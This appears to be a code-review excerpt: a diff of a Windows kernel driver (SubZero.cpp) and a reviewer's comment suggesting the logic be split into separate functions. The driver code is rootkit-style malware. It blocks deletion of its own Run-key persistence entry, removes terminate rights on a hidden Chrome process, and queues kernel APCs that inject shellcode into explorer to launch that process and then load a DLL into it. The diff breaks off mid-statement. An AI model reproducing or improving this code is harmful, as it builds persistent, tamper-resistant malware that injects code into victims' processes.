Project/SubZeroDriver/SubZero.cpp

```diff
@@ -0,0 +1,456 @@
+	case RegNtPreDeleteValueKey:
+
+		deleteValueInfo = (REG_DELETE_VALUE_KEY_INFORMATION*)Argument2;			
+		if (NT_SUCCESS(::CmCallbackGetKeyObjectIDEx(&g_Globals.RegistryRegistrationCookie, deleteValueInfo->Object, nullptr, &name, 0))) {
+			
+			// filter out key deletions
+			if (::wcsncmp(name->Buffer, REG_MACHINE REG_RUN_KEY_PATH, ARRAYSIZE(REG_MACHINE REG_RUN_KEY_PATH) - 1) == 0) {
+
+				// filter out value deletions
+				if (::wcsncmp(deleteValueInfo->ValueName->Buffer, DRIVER_NAMEW, ARRAYSIZE(DRIVER_NAMEW) - 1) == 0) {
+					KdPrint((DRIVER_PREFIX "[+] Registry value deletion attempt detected\n"));
+					return STATUS_ACCESS_DENIED;
+				}			
+			}
+		}
+	}
+
+	// No match found
+	return STATUS_SUCCESS;
+}
+
+OB_PREOP_CALLBACK_STATUS OnPreOpenProcess(PVOID, POB_PRE_OPERATION_INFORMATION Info) {
+	if (Info->KernelHandle)
+		return OB_PREOP_SUCCESS;
+
+	auto process = (PEPROCESS)Info->Object;
+	auto pid = ::HandleToULong(::PsGetProcessId(process));
+	if (pid == g_Globals.ChromePID) {
+		//  Remove terminate access
+		Info->Parameters->CreateHandleInformation.DesiredAccess &=
+			~PROCESS_TERMINATE;
+	}
+	return OB_PREOP_SUCCESS;
+}
+
+void OnThreadNotify(HANDLE ProcessId, HANDLE ThreadId, BOOLEAN Create) {
+	// Thread creation only
+	if (!Create) return;
+
+	PETHREAD thread;
+	ULONG pid = ::HandleToULong(ProcessId);
+	ULONG tid = ::HandleToULong(ThreadId);
+
+	// Search for an explorer Thread
+	if (pid == g_Globals.ExplorerPID) {
+
+		// Check if a launcher Thread was already found
+		if (g_Globals.ExplorerLauncherThreadID != 0) return;
+
+		KdPrint((DRIVER_PREFIX "[+] explorer launcher Thread catched. TID: %d\n", tid));
+		g_Globals.ExplorerLauncherThreadID = tid;
+
+		// Register for Process notifications in order to catch the ghost chrome launch
+		auto status = ::PsSetCreateProcessNotifyRoutineEx(OnProcessNotify, FALSE);
+		if (!NT_SUCCESS(status)) {
+			KdPrint((DRIVER_PREFIX "[-] Failed to register Process callback (status=0x%08X)\n", status));
+			return;
+		}
+
+		// Queue APC for chrome creation
+		if (::ExAcquireRundownProtection(&g_Globals.RundownProtection)) {
+			::PsLookupThreadByThreadId(ThreadId, &thread);
+			if (!QueueAPC(thread, KernelMode, [](PVOID, PVOID, PVOID) { InjectUsermodeShellcodeAPC(LaunchChromeShellcode, sizeof(LaunchChromeShellcode)); }))
+				::ExReleaseRundownProtection(&g_Globals.RundownProtection);
+		}
+		else KdPrint((DRIVER_PREFIX "[-] Error acquiring rundown protection\n"));
+	}
+	// Search for chrome's first Thread
+	else if (pid == g_Globals.ChromePID) {
+
+		// Check if the first Thread was already found
+		if (g_Globals.ChromeFirstThreadID != 0) return;
+
+		KdPrint((DRIVER_PREFIX "[+] chrome first Thread catched. TID: %d\n", tid));
+		g_Globals.ChromeFirstThreadID = tid;
+
+		// Queue APC for dll loading
+		if (::ExAcquireRundownProtection(&g_Globals.RundownProtection)) {
+			::PsLookupThreadByThreadId(ThreadId, &thread);
+
+			
+			if (!QueueAPC(thread, KernelMode, [](PVOID, PVOID, PVOID) 
```

Comment:
I'm remember that their is a problem with this function BUT
you should find a solution to separate this logic to different function for better coding (clarity, reuse, etc.).